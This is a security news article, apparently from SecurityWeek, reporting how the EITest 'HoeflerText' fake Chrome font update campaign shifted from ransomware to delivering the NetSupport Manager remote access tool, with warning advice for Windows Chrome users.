First spotted in December 2016, the attack is tied to the EITest compromise chain, and has been observed distributing the Fleercivet ad fraud malware and ransomware variants such as Spora and Mole. Initially targeting only Chrome, the campaign was expanded earlier this year to target Firefox users as well. The attack relies on pop-ups being displayed in the Chrome browser on Windows devices, claiming that users need to install a so called HoeflerText font pack. Code injected into compromised websites would make the visited pages look unreadable, thus making the fake popup seem legitimate. Fingerprinting capabilities included in the injected code trigger the attack if certain criteria are met (targeted country, correct User-Agent (Chrome on Windows) and proper referer). If the social engineering scheme is successful and the user accepts to install the fake font pack, a file named Font_Chrome.exe is downloaded and executed, and their system is infected with malware. Starting in late August, the malware distributed via these fake Chrome font update notifications is the NetSupport Manager remote access tool (RAT). According to Palo Alto Networks’ Brad Duncan, this should indicate “a potential shift in the motives of this adversary.” The most recent versions of Font_Chrome.exe are represented by file downloaders designed to retrieve a follow-up malware that would install NetSupport Manager. This commercially-available RAT was previously associated with a campaign from hacked Steam accounts last year. While analyzing the recent attack, Palo Alto’s researchers discovered two variants of the file downloader and two instances of follow-up malware to install the RAT. Although the RAT is already at version 12.5, the version Chrome users are targeted with is at version 11.0, the researchers discovered. Chrome users on Windows systems should be suspicious of any popup messages that inform them the “HoeflerText” font wasn’t found. Affected users aren’t expected to notice a difference in their system’s operation, given that this is a backdoor program, but that doesn’t mean they weren’t compromised. He also points out that RATs give attackers more capabilities on an infected host and also provide more flexibility compared with malware that has been designed for a single purpose, and that the recently observed change in the EITest HoeflerText popups might suggest that ransomware is slightly less prominent than it once was. Via http://www.securityweek.com/fake-chrome-font-update-attack-distributes-backdoor